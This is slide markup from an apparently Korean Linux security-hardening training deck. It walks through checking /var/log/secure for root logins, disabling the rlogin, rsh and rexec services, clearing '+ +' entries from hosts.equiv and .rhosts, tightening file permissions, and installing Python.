              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>stty</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일의 소유자 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(test) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ls –l /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>시스템 로그 점검</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/var/log/secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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/Environ/Python</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 설치</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.python.org/downloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>클릭</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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2. Installer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 실행한 후에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>"Install Now＂</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 선택</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파이썬 환경변수 등록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>:＂Add Python 3.9 to PATH＂ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>선택</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설치가 다 되었으면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, close </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>버튼 클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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/var/log/secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로그에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>검색</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># grep root /var/log/secure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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.174.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 로그인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소 입력 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    로그에서 발견한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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/Training/Unit/Sys/3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>R-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>명령어 제한</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R-</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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3)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t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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rlogin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>비활성화</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/rlogin</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disable = no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disable = yes”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 변경 후 저장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>   * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>변경전</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p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>   * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>변경후</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>비활성화</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disable = no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disable = yes”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 변경 후 저장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>3) rexec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>비활성화</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/rexec</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disable = no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disable = yes”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 변경 후 저장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>4) R-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스 비활성화 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># cat /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/rlogin /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/rexec | grep disable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5) /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.equiv </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일의 호스트 정보 삭제</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.equiv</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>+ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>삭제 후 저장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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6) /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일의 호스트 정보 삭제</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>+ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>삭제 후 저장</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7) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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8) /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.equiv </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 접근 권한 변경 및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> 700 /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.equiv</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ls –l /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.equiv</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9) /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일의 접근 권한 변경 및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> 700 /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ls –l /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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r-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>r-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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즉</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
